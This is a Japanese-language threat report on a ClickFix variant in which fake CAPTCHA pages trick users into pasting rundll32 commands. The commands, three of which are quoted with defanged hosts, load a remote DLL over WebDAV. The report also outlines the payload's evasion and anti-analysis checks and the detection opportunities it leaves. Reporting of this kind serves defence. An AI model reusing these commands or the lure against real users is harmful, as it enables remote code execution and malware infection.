新しいClickFix攻撃手法がRundll32とWebDAVを活用
サイバープルーフの脅威研究チームは、ClickFix攻撃技術の新変種について報告しました。この変種では、攻撃者はPowerShellやmshtaなどの一般的に監視されているツールから実行を移動させ、rundll32.exeとWebDAVのようなネイティブなWindowsコンポーネントを利用します。
この進化により、攻撃者は従来のスクリプトベースの検出メカニズムをバイパスし、成功確率が高まる可能性があります。攻撃は以前のClickFixキャンペーンと同様に始まります。被害者は、「healthybyhillary[.]com」のような偽装されたCAPTCHAページに誘導されます。
ユーザーを騙す手法
この新しい変種では、攻撃者がユーザーをWin + Rショートカットを使用して自身のデバイスで悪意のあるコマンドを実行するように操作します。ページはユーザーに「Win + R」キーを押し、特定のコマンドを貼り付け、Enterキーを押すよう指示します。
観察されたコマンドには以下のようなものがあります:
- rundll32.exe \\ser-fluxa[.]omnifree[.]in[.]net@80\verification.
- rundll32.exe \\data-x7-sync.neurosync[.]in[.]net@80\verification.
- rundll32.exe \\mer-forgea.sightup[.]in[.]net@80\verification.
これらのコマンドは、Windows WebDAVミニリダイレクターを使用し、HTTP(ポート80)でホストされたリモートファイルをローカルネットワーク共有としてアクセスします。
Rundll32とWebDAVの利用
攻撃はrundll32.exeが「verification.google」という名前の悪意のあるDLLをダウンロードし、メモリ内で直接実行するところから始まります。その後、PowerShellを使用して追加のペイロードがダウンロードされます。
このペイロードは完全にメモリ上で動作し、高度な回避技術を使用します:
- プロセス環境ブロック(PEB)を歩きながら動的にAPI関数を解決する。
- ファイルをディスクに書き込まずにメモリ内で実行する。
- プロセスインジェクションとメモリの変更活動を行う。
さらに、このペイロードは仮想マシンや分析環境を検出するために複数のチェックを行います:
- 画面解像度やデスクトップの存在を確認する。
- アクティブなユーザーインタラクションがあるかどうかを確認する。
- 異常なシステム時刻の動作を検出する。
検出の機会
この攻撃は、rundll32.exeとWebDAV関連の引数を使用した実行や、rundll32.exeによるHTTP接続などの痕跡を残します。
セキュリティチームは、KQLベースのハンティングクエリーを使用して異常なrundll32の動作を検出できます。